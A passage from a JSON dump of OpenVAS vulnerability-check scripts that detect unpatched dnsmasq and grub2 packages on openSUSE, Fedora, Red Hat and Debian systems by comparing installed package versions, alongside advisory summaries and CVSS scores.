(openSUSE-SU-2017:0016-1)", "type": "openvas", "sourceData": "# Copyright (C) 2017 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851464\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-01-04 09:00:43 +0100 (Wed, 04 Jan 2017)\");\n script_cve_id(\"CVE-2015-8899\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for dnsmasq (openSUSE-SU-2017:0016-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'dnsmasq'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for dnsmasq fixes the following issues:\n\n - CVE-2015-8899: Denial of service between local and remote dns entries\n (bsc#983273)\n\n This update was imported from the SUSE:SLE-12-SP1:Update update project.\");\n\n script_tag(name:\"affected\", value:\"dnsmasq on openSUSE Leap 42.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:0016-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"dnsmasq\", rpm:\"dnsmasq~2.71~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"dnsmasq-debuginfo\", rpm:\"dnsmasq-debuginfo~2.71~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"dnsmasq-debugsource\", rpm:\"dnsmasq-debugsource~2.71~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"dnsmasq-utils\", rpm:\"dnsmasq-utils~2.71~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"dnsmasq-utils-debuginfo\", rpm:\"dnsmasq-utils-debuginfo~2.71~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:35:24", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-08-09T00:00:00", "id": "OPENVAS:1361412562310808769", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808769", "title": "Fedora Update for dnsmasq FEDORA-2016-6db1c9eb69", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for dnsmasq FEDORA-2016-6db1c9eb69\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808769\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-09 05:44:18 +0200 (Tue, 09 Aug 2016)\");\n script_cve_id(\"CVE-2015-8899\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for dnsmasq FEDORA-2016-6db1c9eb69\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'dnsmasq'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"dnsmasq on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-6db1c9eb69\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CLUVZUNLF3AJYCIZKY5R2XMVZKH2L3CF\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"dnsmasq\", rpm:\"dnsmasq~2.76~1.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:35:17", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-08-02T00:00:00", "id": "OPENVAS:1361412562310808950", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808950", "title": "Fedora Update for dnsmasq FEDORA-2016-da2f9c22b4", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for dnsmasq FEDORA-2016-da2f9c22b4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808950\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-02 10:55:37 +0530 (Tue, 02 Aug 2016)\");\n script_cve_id(\"CVE-2015-8899\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for dnsmasq FEDORA-2016-da2f9c22b4\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'dnsmasq'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"dnsmasq on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-da2f9c22b4\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/U6AFZAG4FRUEYRHP53HWJ5LFHVV56AR3\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"dnsmasq\", rpm:\"dnsmasq~2.76~1.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-01-31T18:34:58", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2016-02-02T00:00:00", "id": "OPENVAS:1361412562310851189", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851189", "title": "openSUSE: Security Advisory for grub2 (openSUSE-SU-2016:0036-1)", "type": "openvas", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851189\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-02-02 17:17:23 +0100 (Tue, 02 Feb 2016)\");\n script_cve_id(\"CVE-2015-8370\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for grub2 (openSUSE-SU-2016:0036-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'grub2'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Fix buffer overflows when reading username\n and password. (bsc#956631, CVE-2015-8370)\n\n - Check MS-DOS header to find PE file header. (bsc#954126)\n\n - Use dirname for copying Xen kernel and initrd to esp. (bsc#955493)\n\n - Fix reading password by grub2-mkpasswd-pbdk2 without controlling tty.\n (bsc#954519)\n\n - Add luks, gcry_rijndael and gcry_sha1 to signed EFI image to support\n LUKS partition in default setup. (bsc#917427, bsc#955609)\n\n - Expand list of grub.cfg search path in PV Xen guests for systems\n installed on btrfs snapshots. (bsc#946148, bsc#952539) This update was\n imported from the SUSE:SLE-12-SP1:Update update project.\");\n\n script_tag(name:\"affected\", value:\"grub2 on openSUSE Leap 42.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:0036-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"grub2\", rpm:\"grub2~2.02~beta2~76.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"grub2-branding-upstream\", rpm:\"grub2-branding-upstream~2.02~beta2~76.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"grub2-debuginfo\", rpm:\"grub2-debuginfo~2.02~beta2~76.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"grub2-i386-pc\", rpm:\"grub2-i386-pc~2.02~beta2~76.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"grub2-x86_64-efi\", rpm:\"grub2-x86_64-efi~2.02~beta2~76.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"grub2-x86_64-xen\", rpm:\"grub2-x86_64-xen~2.02~beta2~76.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"grub2-snapper-plugin\", rpm:\"grub2-snapper-plugin~2.02~beta2~76.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"grub2-i386-efi\", rpm:\"grub2-i386-efi~2.02~beta2~76.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:27", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2015-12-16T00:00:00", "id": "OPENVAS:1361412562310871523", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871523", "title": "RedHat Update for grub2 RHSA-2015:2623-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for grub2 RHSA-2015:2623-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871523\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-12-16 05:49:25 +0100 (Wed, 16 Dec 2015)\");\n script_cve_id(\"CVE-2015-8370\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for grub2 RHSA-2015:2623-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'grub2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The grub2 packages provide version 2 of\nthe Grand Unified Bootloader (GRUB), a highly configurable and customizable\nbootloader with modular architecture. The packages support a variety of kernel\nformats, file systems, computer architectures, and hardware devices.\n\nA flaw was found in the way the grub2 handled backspace characters entered\nin username and password prompts. An attacker with access to the system\nconsole could use this flaw to bypass grub2 password protection and gain\nadministrative access to the system. (CVE-2015-8370)\n\nThis update also fixes the following bug:\n\n * When upgrading from Red Hat Enterprise Linux 7.1 and earlier, a\nconfigured boot password was not correctly migrated to the newly introduced\nuser.cfg configuration files. This could possibly prevent system\nadministrators from changing grub2 configuration during system boot even if\nthey provided the correct password. This update corrects the password\nmigration script and the incorrectly generated user.cfg file. (BZ#1290089)\n\nAll grub2 users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues.\");\n script_tag(name:\"affected\", value:\"grub2 on Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:2623-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-December/msg00038.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"grub2\", rpm:\"grub2~2.02~0.33.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"grub2-debuginfo\", rpm:\"grub2-debuginfo~2.02~0.33.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"grub2-efi\", rpm:\"grub2-efi~2.02~0.33.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"grub2-tools\", rpm:\"grub2-tools~2.02~0.33.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:37", "bulletinFamily": "scanner", "description": "Hector Marco and Ismael Ripoll, from\nCybersecurity UPV Research Group, found an integer underflow vulnerability in\nGrub2, a popular bootloader. A local attacker can bypass the Grub2 authentication\nby inserting a crafted input as username or password.", "modified": "2019-03-18T00:00:00", "published": "2015-12-16T00:00:00", "id": "OPENVAS:1361412562310703421", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703421", "title": "Debian Security Advisory DSA 3421-1 (grub2 - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3421.nasl 14278 2019-03-18 14:47:26Z cfischer $\n# Auto-generated from advisory DSA 3421-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703421\");\n script_version(\"$Revision: 14278 $\");\n script_cve_id(\"CVE-2015-8370\");\n script_name(\"Debian Security Advisory DSA 3421-1 (grub2 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:47:26 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-12-16 00:00:00 +0100 (Wed, 16 Dec 2015)\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2015/dsa-3421.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(7|8)\");\n script_tag(name:\"affected\", value:\"grub2 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (wheezy),\nthis problem has been fixed in version 1.99-27+deb7u3.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 2.02~beta2-22+deb8u1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.02~beta2-33.\n\nWe recommend that you upgrade your grub2 packages.\");\n script_tag(name:\"summary\", value:\"Hector Marco and Ismael Ripoll, from\nCybersecurity UPV Research Group, found an integer underflow vulnerability in\nGrub2, a popular bootloader. A local attacker can bypass the Grub2 authentication\nby inserting a crafted input as username or password.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"grub-common\", ver:\"1.99-27+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-coreboot\", ver:\"1.99-27+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-coreboot-bin\", ver:\"1.99-27+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-efi\", ver:\"1.99-27+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-efi-amd64\", ver:\"1.99-27+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-efi-amd64-bin\", ver:\"1.99-27+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-efi-ia32\", ver:\"1.99-27+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-efi-ia32-bin\", ver:\"1.99-27+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-emu\", ver:\"1.99-27+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-firmware-qemu\", ver:\"1.99-27+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-ieee1275\", ver:\"1.99-27+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-ieee1275-bin\", ver:\"1.99-27+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-linuxbios\", ver:\"1.99-27+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-pc\", ver:\"1.99-27+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-pc-bin\", ver:\"1.99-27+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-rescue-pc\", ver:\"1.99-27+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-yeeloong\", ver:\"1.99-27+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-yeeloong-bin\", ver:\"1.99-27+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub2\", ver:\"1.99-27+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub2-common\", ver:\"1.99-27+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-common\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-coreboot\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-coreboot-bin\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-coreboot-dbg\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-efi\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-efi-amd64\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-efi-amd64-bin\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-efi-amd64-dbg\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-efi-arm\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-efi-arm-bin\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-efi-arm-dbg\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-efi-arm64\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-efi-arm64-bin\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-efi-arm64-dbg\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-efi-ia32\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"grub-efi-ia32-bin\", ver:\"2.02~beta2-22+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = 